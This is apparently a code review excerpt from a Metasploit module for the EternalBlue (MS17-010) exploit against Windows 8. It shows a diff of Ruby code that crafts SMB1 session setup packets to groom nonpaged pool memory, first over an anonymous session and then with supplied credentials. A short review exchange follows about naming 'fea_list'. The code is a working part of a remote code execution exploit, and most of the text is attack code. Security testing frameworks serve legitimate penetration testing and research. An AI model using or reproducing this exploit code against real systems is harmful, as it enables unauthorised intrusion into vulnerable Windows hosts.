modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb

```diff
@@ -0,0 +1,893 @@
+
+    pkt.smb_header.pid_low = pid
+
+    if size >= 65535 # 0xffff
+      pkt.data_block.security_blob = [(size / 2).floor].pack('S<') + "\x00" * 20
+      pkt.smb_header.flags2.unicode = 0
+    else
+      pkt.data_block.security_blob = [size].pack('S<') + "\x00" * 20
+      pkt.smb_header.flags2.unicode = 1
+    end
+
+    pkt.smb_header.flags2.extended_security = 0
+    pkt.smb_header.flags2.nt_status = 1
+    pkt.smb_header.flags2.paging_io = 0
+
+    pkt.parameter_block.max_buffer_size = 61440 # can be any value greater than response size
+    pkt.parameter_block.max_mpx_count = 2 # can by any value
+    pkt.parameter_block.vc_number = 2 # any non-zero
+    pkt.parameter_block.session_key = 0
+    pkt.parameter_block.security_blob_length = 0 # this is OEMPasswordLen field in another format. 0 for NULL session
+
+    pkt.parameter_block.capabilities.each_pair do |k, _v|
+      if k == :nt_status || k == :extended_security
+        pkt.parameter_block.capabilities[k] = 1
+      else
+        pkt.parameter_block.capabilities[k] = 0
+      end
+    end
+
+    recv_pkt = RubySMB::SMB1::Packet::SessionSetupResponse.read(anon_conn.send_recv(pkt))
+
+    if recv_pkt.status_code.value == 0
+      print_good('SMB1 session setup allocate nonpaged pool success')
+      return anon_conn, anon_sock
+    end
+
+    anon_conn.disconnect!
+
+    unless username.empty?
+      # Try login with valid user because anonymous user might get access denied on Windows Server 2012.
+      # Note: If target allows only NTLMv2 authentication, the login will always fail.
+      # support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)
+      req_size = (size / 2).floor
+      pkt.smb_header.flags2.unicode = 0
+
+      auth_conn, _auth_tree, auth_sock = smb1_connect_ipc(negotiate_only: true)
+
+      pkt.smb_header.pid_low = pid
+
+      # challenge_packet = conn.smb1_ntlmssp_challenge_packet(conn.smb1_ntlmssp_negotiate)
+      # type2_b64_message = conn.smb1_type2_message(challenge_packet)
+
+      # server_challenge = response_packet.data_block.server_guid[0, 8]
+      server_challenge = auth_conn.server_guid[0, 8]
+
+      pwd_unicode = NTLM_CRYPT.ntlm_md4(password, server_challenge)
+
+      pkt.parameter_block.reserved = pwd_unicode.length
+      pkt.data_block.security_blob = [req_size + pwd_unicode.length + username.length].pack('S<') + pwd_unicode + username + "\x00" * 16
+
+      recv_pkt = RubySMB::SMB1::Packet::SessionSetupResponse.read(auth_conn.send_recv(pkt))
+
+      if recv_pkt.status_code.value == 0
+        print_good('SMB1 session setup allocate nonpaged pool success')
+        return auth_conn, auth_sock
+      end
+      auth_conn.disconnect!
+    end
+
+    print_error("SMB1 session setup allocate nonpaged pool failed: #{recv_pkt.status_code.name}\n#{recv_pkt.status_code.description}")
+    return nil
+  end
+
+  def generate_feal_list_nx
```

Comment:
should it be `fea_list` or `feal_list` I see both being used

Reply:
yep, should be fea_list 👍